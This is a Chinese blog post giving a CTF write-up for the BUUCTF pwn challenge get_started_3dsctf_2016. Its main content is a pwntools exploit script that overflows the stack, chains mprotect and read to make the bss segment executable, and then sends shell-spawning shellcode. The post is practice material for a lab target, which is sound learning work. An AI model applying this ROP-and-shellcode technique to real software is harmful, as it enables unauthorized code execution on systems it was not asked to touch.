【BUUCTF - PWN】get_started_3dsctf_2016

checksec一下,可以栈溢出

IDA打开看看,一个很普通的栈溢出漏洞,有后门函数,应该说是一道非常简单的题了

但是,本地打通非常容易,可是靶机打不通 =_=
于是乎,换个方法,利用mprotect函数修改bss段为rwx,写入shellcode跳过去执行

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='i386'
context.log_level='debug'

sl=lambda x:io.sendline(x)

io=remote('xxx',xxx)
elf=ELF('./get_started_3dsctf_2016')

bss=0x080eb000
pop_ebx_esi_edi_ret=0x080509a5

payload='a'*0x38+p32(elf.sym['mprotect'])+p32(pop_ebx_esi_edi_ret)+p32(bss)+p32(0x2d)+p32(7)+p32(elf.sym['read'])+p32(bss)+p32(0)+p32(bss)+p32(0x2d)
sl(payload)
payload=asm(shellcraft.sh())
sl(payload)

io.interactive()

附件:get_started_3dsctf_2016

发布了29 篇原创文章 · 获赞 7 · 访问量 6643
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 点我我会动 设计师: 上身试试

分享到微信朋友圈

×

扫一扫,手机浏览